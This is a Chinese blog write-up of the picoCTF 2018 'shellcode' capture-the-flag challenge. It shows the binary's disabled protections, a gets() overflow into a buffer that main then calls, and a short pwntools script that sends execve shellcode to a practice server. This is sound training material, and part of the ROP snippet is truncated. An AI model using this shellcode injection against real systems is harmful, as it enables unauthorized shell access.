• picoctf_2018_shellcode


    picoctf_2018_shellcode

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6

    32位,啥都没开

    这个看着挺大的,直接来个ROPchain,

    #!/usr/bin/env python2
    	# execve generated by ROPgadget
    
    	from struct import pack
    
    	# Padding goes here
    	p = ''
    
    	p += pack('
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36
    • 37
    • 38
    • 39
    • 40
    • 41

    还真有

    ,然后让我看看溢出点

    main函数无法编译,(得看汇编了

    (但是我们可以反汇编vuln函数

    int __cdecl vuln(int a1)
    {
      gets(a1);
      return puts(a1);
    }
    
    • 1
    • 2
    • 3
    • 4
    • 5

    vuln很简单,但是a1在栈中的位置

    我们看看main传了什么进去

    .text:080488F2                 add     esp, 10h
    .text:080488F5                 sub     esp, 0Ch
    .text:080488F8                 lea     eax, [ebp+var_A0]
    .text:080488FE                 push    eax
    .text:080488FF                 call    vuln
    
    • 1
    • 2
    • 3
    • 4
    • 5

    把var_A0传入,也就是我们输入的位置,从var_A0开始写入

    在观察一下main的汇编

    发现一个东西

    .text:08048914                 add     esp, 10h
    .text:08048917                 lea     eax, [ebp+var_A0]
    .text:0804891D                 call    eax
    .text:0804891F                 mov     eax, 0
    .text:08048924                 mov     ecx, [ebp+var_4]
    .text:08048927                 leave
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6

    在main的后面有个call var_A0也就是说,我们写的东西能直接执行,并且也没开NX

    思路

    直接写shellcode

    from pwn import*
    from Yapack import *
    r,elf=rec("node4.buuoj.cn",25457,"./pwn",0)
    context(os='linux', arch='i386',log_level='debug')
    
    sl(asm(shellcraft.sh()))
    
    ia()
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8

    在这里插入图片描述

  • 相关阅读:
    未来已来:探索IT行业的革新与大模型技术的突破
    神经网络-文本-图像-音频-视频基础知识
    YOLO-World:实时开放词汇目标检测
    基于51单片机的客车辆超载报警Proteus仿真
    线下实体店铺会员引流的四种方法-未完待续
    数据库与MPP数仓(二十九):使用prometheus和grafana搭建postgresql的监控/告警框架
    .NET指定图片地址下载并转换Base64字符串
    概率论重点笔记
    如何通过QGC实现无人机的自动化任务,包括飞行计划的制定和执行。
    基于JAVA课程网站设计计算机毕业设计源码+系统+mysql数据库+lw文档+部署
  • 原文地址:https://blog.csdn.net/qq_62887641/article/details/133470750